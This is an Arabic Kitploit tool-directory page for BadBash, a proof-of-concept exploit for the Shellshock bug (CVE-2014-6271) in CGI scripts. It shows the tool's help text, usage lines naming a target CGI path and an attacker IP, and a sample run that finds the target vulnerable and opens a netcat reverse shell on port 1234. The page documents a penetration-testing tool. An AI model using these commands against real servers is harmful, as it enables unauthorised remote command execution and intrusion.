Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
BadBash — أداة إثبات المفهوم (PoC) لاستغلال CVE-2014-6271 (ShellShock) لتنفيذ الأوامر عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/securusglobal/badbash
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubsecurusglobal/badbash

BadBash

أداة إثبات المفهوم (PoC) لاستغلال CVE-2014-6271 (ShellShock) لتنفيذ الأوامر عن بُعد (RCE)

عرض المستودع
41منذ 11 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

BadBash

أداة إثبات المفهوم لثغرة RCE CVE-2014-6271 (ShellShock)

======= BadBash هي أداة استغلال ثغرة RCE CVE-2014-6271. النسخة الأساسية تفحص فقط موقع CGI عبر HTTP وتوفر فقط شل عكسي عبر netcat على المنفذ 1234.

المطور: Andy Yang الإصدار: 0.1.0 الترخيص: GPLv3

المشروع الأصلي على GitHub: https://github.com/RainMak3r/Rainstorm

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - أداة RCE لثغرة CVE-2014-6271 بواسطة Andy Yang النسخة الأساسية تفحص فقط مواقع HTTP النسخة الأساسية توفر فقط شل عكسي عبر netcat على المنفذ 1234

مثال الاستخدام:

root@kitploit:~
 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path            المسار الكامل لصفحة CGI
-d, --Destination IP             عنوان IP الخاص بك الذي يستمع للاتصالات الواردة
-h, --help                       عرض المساعدة

================================================================================================ مثال على الاستخدام.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] جارٍ التحقق مما إذا كان الهدف ضعيفًا........

[Info] قد يستغرق هذا ما يصل إلى 10 ثوان........

[Info] الهدف ضعيف!!!

[Info] يُرجى استخدام NC للاستماع على المنفذ 1234 للحصول على شل عكسي..........

[Info] جارٍ استغلال الثغرة للحصول على شل عكسي للاتصال بـ 172.16.189.1:1234 عبر netcat ..........

تنزيل الأداة